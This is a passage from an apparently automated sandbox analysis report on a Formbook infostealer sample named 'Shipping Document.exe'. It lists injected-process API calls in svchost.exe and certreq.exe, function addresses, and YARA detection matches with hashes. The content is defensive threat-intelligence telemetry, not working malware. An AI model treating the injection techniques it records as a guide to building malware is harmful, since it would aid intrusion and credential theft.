            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582E30 NtWriteVirtualMemory,4_2_05582E30
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582EA0 NtAdjustPrivilegesToken,4_2_05582EA0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582B80 NtQueryInformationFile,4_2_05582B80
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05582AB0 NtWaitForSingleObject,4_2_05582AB0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_02F47710 NtCreateFile,4_2_02F47710
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_02F47B30 NtAllocateVirtualMemory,4_2_02F47B30
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_02F47870 NtReadFile,4_2_02F47870
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_02F479E0 NtClose,4_2_02F479E0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_02F47950 NtDeleteFile,4_2_02F47950
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_01024021: CreateFileW,DeviceIoControl,CloseHandle,1_2_01024021
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_01018858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,1_2_01018858
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_0102545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,1_2_0102545F
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FCE8001_2_00FCE800
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FEDBB51_2_00FEDBB5
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FCE0601_2_00FCE060
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_0104804A1_2_0104804A
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FD41401_2_00FD4140
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FE24051_2_00FE2405
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FF65221_2_00FF6522
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FF267E1_2_00FF267E
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_010406651_2_01040665
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FD68431_2_00FD6843
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FE283A1_2_00FE283A
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FF89DF1_2_00FF89DF
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_0101EB071_2_0101EB07
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_01028B131_2_01028B13
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FF6A941_2_00FF6A94
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FD8A0E1_2_00FD8A0E
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_01040AE21_2_01040AE2
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FECD611_2_00FECD61
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FF70061_2_00FF7006
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FD31901_2_00FD3190
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FD710E1_2_00FD710E
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FC12871_2_00FC1287
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FE33C71_2_00FE33C7
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FEF4191_2_00FEF419
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FE16C41_2_00FE16C4
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FD56801_2_00FD5680
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FE78D31_2_00FE78D3
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FD58C01_2_00FD58C0
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FE1BB81_2_00FE1BB8
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FF9D051_2_00FF9D05
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FCFE401_2_00FCFE40
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FEBFE61_2_00FEBFE6
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_00FE1FD01_2_00FE1FD0
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 1_2_01E536801_2_01E53680
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004030402_2_00403040
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F8732_2_0040F873
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042D0B32_2_0042D0B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011902_2_00401190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041619E2_2_0041619E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004161A32_2_004161A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004022C02_2_004022C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401AFB2_2_00401AFB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FA932_2_0040FA93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004022BA2_2_004022BA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401B002_2_00401B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DB132_2_0040DB13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004024B02_2_004024B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA3522_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F02_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031003E62_2_031003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E02742_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C02C02_2_030C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030301002_2_03030100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA1182_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C81582_2_030C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F41A22_2_030F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031001AA2_2_031001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F81CC2_2_030F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D20002_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030647502_2_03064750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030407702_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C02_2_0303C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C6E02_2_0305C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030405352_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031005912_2_03100591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E44202_2_030E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F24462_2_030F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EE4F62_2_030EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB402_2_030FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F6BD72_2_030F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303EA802_2_0303EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030569622_2_03056962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030429A02_2_030429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310A9A62_2_0310A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304A8402_2_0304A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030428402_2_03042840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030268B82_2_030268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E8F02_2_0306E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03082F282_2_03082F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060F302_2_03060F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E2F302_2_030E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4F402_2_030B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BEFA02_2_030BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032FC82_2_03032FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304CFE02_2_0304CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEE262_2_030FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040E592_2_03040E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03052E902_2_03052E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FCE932_2_030FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FEEDB2_2_030FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304AD002_2_0304AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DCD1F2_2_030DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03058DBF2_2_03058DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303ADE02_2_0303ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040C002_2_03040C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0CB52_2_030E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030CF22_2_03030CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F132D2_2_030F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D34C2_2_0302D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0308739A2_2_0308739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030452A02_2_030452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B2C02_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E12ED2_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307516C2_2_0307516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302F1722_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B16B2_2_0310B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304B1B02_2_0304B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EF0CC2_2_030EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C02_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F70E92_2_030F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF0E02_2_030FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF7B02_2_030FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030856302_2_03085630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F16CC2_2_030F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F75712_2_030F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DD5B02_2_030DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031095C32_2_031095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FF43F2_2_030FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030314602_2_03031460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFB762_2_030FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FB802_2_0305FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B5BF02_2_030B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307DBF92_2_0307DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFA492_2_030FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7A462_2_030F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B3A6C2_2_030B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DDAAC2_2_030DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03085AA02_2_03085AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E1AA32_2_030E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EDAC62_2_030EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D59102_2_030D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030499502_2_03049950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B9502_2_0305B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD8002_2_030AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030438E02_2_030438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFF092_2_030FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041F922_2_03041F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFFB12_2_030FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03003FD22_2_03003FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03003FD52_2_03003FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03049EB02_2_03049EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043D402_2_03043D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F1D5A2_2_030F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F7D732_2_030F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305FDC02_2_0305FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B9C322_2_030B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FFCF22_2_030FFCF2
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_056075714_2_05607571
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055505354_2_05550535
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055ED5B04_2_055ED5B0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_056105914_2_05610591
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_056024464_2_05602446
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055414604_2_05541460
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0560F43F4_2_0560F43F
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055FE4F64_2_055FE4F6
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055747504_2_05574750
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055507704_2_05550770
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0554C7C04_2_0554C7C0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0560F7B04_2_0560F7B0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_056016CC4_2_056016CC
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0556C6E04_2_0556C6E0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055D81584_2_055D8158
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0561B16B4_2_0561B16B
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0553F1724_2_0553F172
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0558516C4_2_0558516C
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055EA1184_2_055EA118
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055401004_2_05540100
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_056081CC4_2_056081CC
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_056101AA4_2_056101AA
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0555B1B04_2_0555B1B0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0560F0E04_2_0560F0E0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_056070E94_2_056070E9
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055FF0CC4_2_055FF0CC
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055570C04_2_055570C0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0553D34C4_2_0553D34C
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0560A3524_2_0560A352
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0560132D4_2_0560132D
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_056103E64_2_056103E6
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0555E3F04_2_0555E3F0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0559739A4_2_0559739A
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055F02744_2_055F0274
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0556B2C04_2_0556B2C0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055D02C04_2_055D02C0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055F12ED4_2_055F12ED
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055552A04_2_055552A0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05607D734_2_05607D73
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05553D404_2_05553D40
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05601D5A4_2_05601D5A
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0555AD004_2_0555AD00
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0556FDC04_2_0556FDC0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0554ADE04_2_0554ADE0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05568DBF4_2_05568DBF
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05550C004_2_05550C00
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055C9C324_2_055C9C32
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0560FCF24_2_0560FCF2
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05540CF24_2_05540CF2
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055F0CB54_2_055F0CB5
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055C4F404_2_055C4F40
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05570F304_2_05570F30
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0560FF094_2_0560FF09
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05592F284_2_05592F28
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05542FC84_2_05542FC8
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0555CFE04_2_0555CFE0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05551F924_2_05551F92
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0560FFB14_2_0560FFB1
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055CEFA04_2_055CEFA0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05550E594_2_05550E59
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0560EE264_2_0560EE26
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0560EEDB4_2_0560EEDB
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05562E904_2_05562E90
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05559EB04_2_05559EB0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0560CE934_2_0560CE93
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055599504_2_05559950
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0556B9504_2_0556B950
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055669624_2_05566962
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0561A9A64_2_0561A9A6
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055529A04_2_055529A0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055528404_2_05552840
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0555A8404_2_0555A840
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055BD8004_2_055BD800
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0557E8F04_2_0557E8F0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055538E04_2_055538E0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055368B84_2_055368B8
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0560FB764_2_0560FB76
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0560AB404_2_0560AB40
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0558DBF94_2_0558DBF9
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055C5BF04_2_055C5BF0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05606BD74_2_05606BD7
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0556FB804_2_0556FB80
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05607A464_2_05607A46
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0560FA494_2_0560FA49
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055C3A6C4_2_055C3A6C
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055FDAC64_2_055FDAC6
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_0554EA804_2_0554EA80
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_055EDAAC4_2_055EDAAC
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_05595AA04_2_05595AA0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_02F313A04_2_02F313A0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_02F2C7D04_2_02F2C7D0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_02F2C5B04_2_02F2C5B0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_02F2A8504_2_02F2A850
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_02F32EE04_2_02F32EE0
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_02F32EDB4_2_02F32EDB
            Source: C:\Windows\SysWOW64\certreq.exeCode function: 4_2_02F49DF04_2_02F49DF0
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: String function: 00FE0D27 appears 70 times
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: String function: 00FC7F41 appears 35 times
            Source: C:\Users\user\Desktop\Shipping Document.exeCode function: String function: 00FE8B40 appears 42 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03075130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 030AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B970 appears 277 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03087E54 appears 111 times
            Source: C:\Windows\SysWOW64\certreq.exeCode function: String function: 055BEA12 appears 86 times
            Source: C:\Windows\SysWOW64\certreq.exeCode function: String function: 05597E54 appears 98 times
            Source: C:\Windows\SysWOW64\certreq.exeCode function: String function: 0553B970 appears 269 times
            Source: C:\Windows\SysWOW64\certreq.exeCode function: String function: 055CF290 appears 105 times
            Source: C:\Windows\SysWOW64\certreq.exeCode function: String function: 05585130 appears 36 times
            Source: Shipping Document.exe, 00000001.00000003.1507169817.0000000003D9D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Shipping Document.exe
            Source: Shipping Document.exe, 00000001.00000003.1507813362.0000000003C43000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Shipping Document.exe
            Source: Shipping Document.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3984304736.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3980970277.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1670104693.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
